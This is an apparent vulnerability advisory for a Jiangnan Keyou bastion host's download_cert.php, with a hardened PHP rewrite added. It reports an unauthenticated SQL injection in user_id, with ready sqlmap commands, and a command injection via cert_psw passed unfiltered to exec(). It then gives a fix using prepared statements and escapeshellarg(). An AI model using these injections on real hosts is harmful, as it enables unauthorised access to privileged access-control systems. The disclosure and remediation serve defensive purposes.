Jiangnan Keyou bastion host, all versions: code execution + SQL injection (no login required)
SQL injection:
/system/download_cert.php?manager=1&user_id=2&cert_psw=11 (injection point: the user_id parameter)
sqlmap -u "https://12XX.XXXX.9X/system/download_cert.php?manager=1&user_id=2&cert_psw=11"
sqlmap -u "https://12XX.XXXX.9X/system/download_cert.php?manager=1&user_id=2&cert_psw=11" --dbs
Code execution:
The same file is affected, this time through the cert_psw parameter:
/system/download_cert.php, parameter cert_psw
The relevant code is as follows:
if (!empty($cert_msg)) {
    $cmd = "openssl pkcs12 -export";
    if (!empty($_GET['cert_psw'])) {
        // user-controlled value concatenated straight into the shell command line
        $cmd .= " -password pass:" . $_GET['cert_psw'];
    } else {
        $cmd .= " -password pass:";
    }
    $cmd .= " -inkey /usr/local/keyou/Config/certs/" . $cert_msg[0]['serial_no'] . ".key"
          . " -in /usr/local/keyou/Config/certs/" . $cert_msg[0]['serial_no'] . ".pem"
          . " -out /usr/local/apache2/htdocs/project/www/download/" . $cert_msg[0]['serial_no'] . ".pfx";
    //echo $cmd;
    exec($cmd);   // the unfiltered cert_psw value reaches the shell here
}
$_GET['cert_psw'] is passed into the dangerous exec() function without any filtering, so shell metacharacters in the parameter are interpreted by the shell, resulting in code execution.
Solution:
Filter the parameters: escape cert_psw before it is placed on the command line, and do not concatenate user_id into the SQL query.
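As an added example (not Jiangnan Keyou's code), the following is a hardened rewrite of the download_cert.php fragment quoted above, covering both findings: the user_id lookup uses a prepared statement, and every dynamic value on the openssl command line goes through escapeshellarg(). It assumes $pdo is an open PDO connection; the table name user_certs and its columns are placeholders, since the page does not show the original query.

```php
<?php
// Added example, not the vendor's code: hardened form of the download_cert.php
// fragment. Assumptions: $pdo is an open PDO connection; the table "user_certs"
// and its columns are placeholders for whatever the original query uses.

// Look up the certificate serial for a user with a bound parameter, so the
// user_id value can no longer change the structure of the SQL statement.
function fetch_serial_no(PDO $pdo, $user_id)
{
    if (!ctype_digit((string) $user_id)) {
        return null; // user_id must be a non-negative integer
    }
    $stmt = $pdo->prepare('SELECT serial_no FROM user_certs WHERE user_id = :uid');
    $stmt->execute([':uid' => (int) $user_id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['serial_no'] : null;
}

// Build the openssl command with each argument wrapped by escapeshellarg(),
// so characters such as ; | ` $ ( ) in cert_psw are handed to openssl as
// literal password characters instead of being interpreted by the shell.
function build_pkcs12_command($serial_no, $cert_psw)
{
    // serial_no becomes part of a file name; restrict it to a conservative
    // character set so a crafted database row cannot become a path traversal.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $serial_no)) {
        return null;
    }
    $certDir = '/usr/local/keyou/Config/certs/';
    $outDir  = '/usr/local/apache2/htdocs/project/www/download/';

    $cmd  = 'openssl pkcs12 -export';
    $cmd .= ' -password ' . escapeshellarg('pass:' . $cert_psw); // empty psw -> 'pass:'
    $cmd .= ' -inkey ' . escapeshellarg($certDir . $serial_no . '.key');
    $cmd .= ' -in '    . escapeshellarg($certDir . $serial_no . '.pem');
    $cmd .= ' -out '   . escapeshellarg($outDir . $serial_no . '.pfx');
    return $cmd;
}

// Request handling glue (this is where the $pdo assumption is used).
$user_id  = isset($_GET['user_id'])  ? $_GET['user_id']  : '';
$cert_psw = isset($_GET['cert_psw']) ? $_GET['cert_psw'] : '';

$serial_no = fetch_serial_no($pdo, $user_id);
$cmd = ($serial_no !== null) ? build_pkcs12_command($serial_no, $cert_psw) : null;
if ($cmd === null) {
    http_response_code(400);
    exit('invalid request');
}
exec($cmd, $output, $status);
if ($status !== 0) {
    http_response_code(500);
    exit('certificate export failed');
}
```

Two design notes: escapeshellarg() is the right primitive here because the value must reach openssl unchanged, whereas a blacklist of "dangerous" characters is easy to get wrong; and because a password on a command line is visible in the process list, a further step is to hand it to openssl through the `-password env:VARNAME` form (with the variable set via putenv()) rather than `pass:`, which takes the secret out of the argument vector entirely.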